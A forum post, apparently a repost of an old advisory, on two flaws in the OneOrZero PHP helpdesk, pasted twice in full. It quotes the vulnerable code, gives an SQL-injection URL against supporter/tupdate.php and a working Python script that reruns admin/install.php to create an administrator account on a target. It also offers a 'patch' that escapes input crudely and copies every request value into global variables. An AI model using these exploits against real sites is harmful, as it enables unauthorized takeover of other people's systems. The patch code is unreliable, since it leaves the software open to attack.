CourtneyDS
Baseband Member
- Messages
- 56
Problems :
- SQL Injection
- Admin Access
PHP Code/Location :
supporter/tupdate.php :
if($groupid == 'change'){
$sql = "UPDATE $mysql_tickets_table set groupid=$sg where id=$id";
$result = $db->query($sql);
}
admin/install.php :
[...]
if($step == 2){
echo "
";
start("Helpdesk Installation", "center");
if($HTTP_POST_VARS['first'] == ''){
showError("first name");
$flag = 1;
}
if($HTTP_POST_VARS['last'] == ''){
showError("last name");
$flag = 1;
}
if($HTTP_POST_VARS['user'] == ''){
showError("user name");
$flag = 1;
}
if($HTTP_POST_VARS['email'] == ''){
showError("email address");
$flag = 1;
}
if($HTTP_POST_VARS['pwd1'] == '' || $HTTP_POST_VARS['pwd2'] == ''){
showError("password");
$flag = 1;
}
if($HTTP_POST_VARS['office'] == ''){
showError("office");
$flag = 1;
}
if (!checkPwd($HTTP_POST_VARS['pwd1'], $HTTP_POST_VARS['pwd2'])){
showError("password");
$flag = 1;
}
if(!validEmail($HTTP_POST_VARS['email'])){
showError("email");
$flag = 1;
}
if($flag == 1){
endit();
exit;
}
[...]
$pwd = md5($HTTP_POST_VARS['pwd1']);
$query = "INSERT IGNORE into $mysql_users_table VALUES(NULL,
'".$HTTP_POST_VARS['first']."', '".$HTTP_POST_VARS['last']."',
'".$HTTP_POST_VARS['user']."', '".$HTTP_POST_VARS['email']."', '',
'".$pwd."', '".$HTTP_POST_VARS['office']."', '".$HTTP_POST_VARS['phone']."',
1, 1, 1, 'default', null, null, null, 0, 'English', '0')";
$db->query($query);
[...]
Exploits :
]/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10http://[target]/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10
will change the description of the ticket number 10 into "abcd"
(char(97,98,99,100))
To exploit the second one.. in python 2.2 :
import urlparse
import httplib
import string
OneOrZero("http://www.target.com","80","NewUserName","NewPassword")
class OneOrZero:
def __init__(self,target,port,user,password):
if port != "":
self.port=str(port)
else :
self.port="80"
self.path=str(urlparse.urlparse(target)[2])
self.target=str(urlparse.urlparse(target)[1])
self.user=str(user)
self.password=str(password)
self.USER_AGENT='OneOrZero.py'
self.CreateAdminAccount()
def CreateAdminAccount(self):
data='step=2&first=admin&last=admin&user='+self.user+'&pwd1='+self.password+'&pwd2='+self.password+'&email=a@a.a&office=abcd'
try :
print "Connecting On "+self.target+"...\n"
http=httplib.HTTP(self.target,self.port)
print "Sending Data On "+self.target+"...\n"
http.putrequest("POST",self.path+"/admin/install.php")
http.putheader("Content-Type","application/x-www-form-urlencoded")
http.putheader("User-Agent",self.USER_AGENT)
http.putheader("Host",self.target)
http.putheader("Content-Length",str(len(data)))
http.endheaders()
http.send(data)
code,msg,headers = http.getreply()
print "HTTP Code : ",str(code)
print "HTTP Connection : ",msg
print "HTTP headers : \n",headers,"\n"
file=http.getfile()
if string.find(file.read(),"Administrator Account Created
Successfully.") != -1:
print "Congratulations, Administrator Account Created
Successfully."
print "You Can Log In Here :
http://"+self.target+self.path+"/admin/control.php"
print "User : ",self.user
print "Password : ",self.password
else :
print "Administrator Account Hasn't Been Created."
except :
print "Error During Admin Account Creation."
You just have to change the line :
OneOrZero("http://www.target.com","80","NewUserName","NewPassword")
Solution :
A patch (and more details in French) can be found on
.http://www.phpsecure.info.
- In supporter/tupdate.php, add the lines (at the begin) :
foreach ($_REQUEST as $key=>$value) {
if (get_magic_quotes_gpc()==0) {
$value = addslashes($value); // This will reproduce the option
magic_quotes_gpc=1
}
$value = str_replace('(','()',$value);
${$key} = $value;
$_REQUEST[$key] = $value;
if (isset($_POST[$key])) { $_POST[$key] = $value; }
if (isset($_COOKIE[$key])) { $_COOKIE[$key] = $value; }
if (isset($_FILE[$key])) { $_FILE[$key] = $value; }
if (isset($_GET[$key])) { $_GET[$key] = $value; }
if (isset($HTTP_POST_VARS[$key])) { $HTTP_POST_VARS[$key] = $value; }
if (isset($HTTP_COOKIE_VARS[$key])) { $HTTP_COOKIE_VARS[$key] = $value;
}
if (isset($HTTP_FILE_VARS[$key])) { $HTTP_FILE_VARS[$key] = $value; }
if (isset($HTTP_GET_VARS[$key])) { $HTTP_GET_VARS[$key] = $value; }
}
- In admin/install.php.. put the lines :
$sql = "SELECT * FROM $mysql_users_table WHERE id > 0";
$result = $db->query($sql);
$num_rows = $db->num_rows($result);
if ($num_rows > 0){
die("OneOrZero Is Already Installed.");
}
just after :
if($step == 2){
Credit to eLtorO
Sincerely
CourtneyDS
- SQL Injection
- Admin Access
PHP Code/Location :
supporter/tupdate.php :
if($groupid == 'change'){
$sql = "UPDATE $mysql_tickets_table set groupid=$sg where id=$id";
$result = $db->query($sql);
}
admin/install.php :
[...]
if($step == 2){
echo "
";
start("Helpdesk Installation", "center");
if($HTTP_POST_VARS['first'] == ''){
showError("first name");
$flag = 1;
}
if($HTTP_POST_VARS['last'] == ''){
showError("last name");
$flag = 1;
}
if($HTTP_POST_VARS['user'] == ''){
showError("user name");
$flag = 1;
}
if($HTTP_POST_VARS['email'] == ''){
showError("email address");
$flag = 1;
}
if($HTTP_POST_VARS['pwd1'] == '' || $HTTP_POST_VARS['pwd2'] == ''){
showError("password");
$flag = 1;
}
if($HTTP_POST_VARS['office'] == ''){
showError("office");
$flag = 1;
}
if (!checkPwd($HTTP_POST_VARS['pwd1'], $HTTP_POST_VARS['pwd2'])){
showError("password");
$flag = 1;
}
if(!validEmail($HTTP_POST_VARS['email'])){
showError("email");
$flag = 1;
}
if($flag == 1){
endit();
exit;
}
[...]
$pwd = md5($HTTP_POST_VARS['pwd1']);
$query = "INSERT IGNORE into $mysql_users_table VALUES(NULL,
'".$HTTP_POST_VARS['first']."', '".$HTTP_POST_VARS['last']."',
'".$HTTP_POST_VARS['user']."', '".$HTTP_POST_VARS['email']."', '',
'".$pwd."', '".$HTTP_POST_VARS['office']."', '".$HTTP_POST_VARS['phone']."',
1, 1, 1, 'default', null, null, null, 0, 'English', '0')";
$db->query($query);
[...]
Exploits :
]/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10http://[target]/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10
will change the description of the ticket number 10 into "abcd"
(char(97,98,99,100))
To exploit the second one.. in python 2.2 :
import urlparse
import httplib
import string
OneOrZero("http://www.target.com","80","NewUserName","NewPassword")
class OneOrZero:
def __init__(self,target,port,user,password):
if port != "":
self.port=str(port)
else :
self.port="80"
self.path=str(urlparse.urlparse(target)[2])
self.target=str(urlparse.urlparse(target)[1])
self.user=str(user)
self.password=str(password)
self.USER_AGENT='OneOrZero.py'
self.CreateAdminAccount()
def CreateAdminAccount(self):
data='step=2&first=admin&last=admin&user='+self.user+'&pwd1='+self.password+'&pwd2='+self.password+'&email=a@a.a&office=abcd'
try :
print "Connecting On "+self.target+"...\n"
http=httplib.HTTP(self.target,self.port)
print "Sending Data On "+self.target+"...\n"
http.putrequest("POST",self.path+"/admin/install.php")
http.putheader("Content-Type","application/x-www-form-urlencoded")
http.putheader("User-Agent",self.USER_AGENT)
http.putheader("Host",self.target)
http.putheader("Content-Length",str(len(data)))
http.endheaders()
http.send(data)
code,msg,headers = http.getreply()
print "HTTP Code : ",str(code)
print "HTTP Connection : ",msg
print "HTTP headers : \n",headers,"\n"
file=http.getfile()
if string.find(file.read(),"Administrator Account Created
Successfully.") != -1:
print "Congratulations, Administrator Account Created
Successfully."
print "You Can Log In Here :
http://"+self.target+self.path+"/admin/control.php"
print "User : ",self.user
print "Password : ",self.password
else :
print "Administrator Account Hasn't Been Created."
except :
print "Error During Admin Account Creation."
You just have to change the line :
OneOrZero("http://www.target.com","80","NewUserName","NewPassword")
Solution :
A patch (and more details in French) can be found on
.http://www.phpsecure.info.
- In supporter/tupdate.php, add the lines (at the begin) :
foreach ($_REQUEST as $key=>$value) {
if (get_magic_quotes_gpc()==0) {
$value = addslashes($value); // This will reproduce the option
magic_quotes_gpc=1
}
$value = str_replace('(','()',$value);
${$key} = $value;
$_REQUEST[$key] = $value;
if (isset($_POST[$key])) { $_POST[$key] = $value; }
if (isset($_COOKIE[$key])) { $_COOKIE[$key] = $value; }
if (isset($_FILE[$key])) { $_FILE[$key] = $value; }
if (isset($_GET[$key])) { $_GET[$key] = $value; }
if (isset($HTTP_POST_VARS[$key])) { $HTTP_POST_VARS[$key] = $value; }
if (isset($HTTP_COOKIE_VARS[$key])) { $HTTP_COOKIE_VARS[$key] = $value;
}
if (isset($HTTP_FILE_VARS[$key])) { $HTTP_FILE_VARS[$key] = $value; }
if (isset($HTTP_GET_VARS[$key])) { $HTTP_GET_VARS[$key] = $value; }
}
- In admin/install.php.. put the lines :
$sql = "SELECT * FROM $mysql_users_table WHERE id > 0";
$result = $db->query($sql);
$num_rows = $db->num_rows($result);
if ($num_rows > 0){
die("OneOrZero Is Already Installed.");
}
just after :
if($step == 2){
Credit to eLtorO
Sincerely
CourtneyDS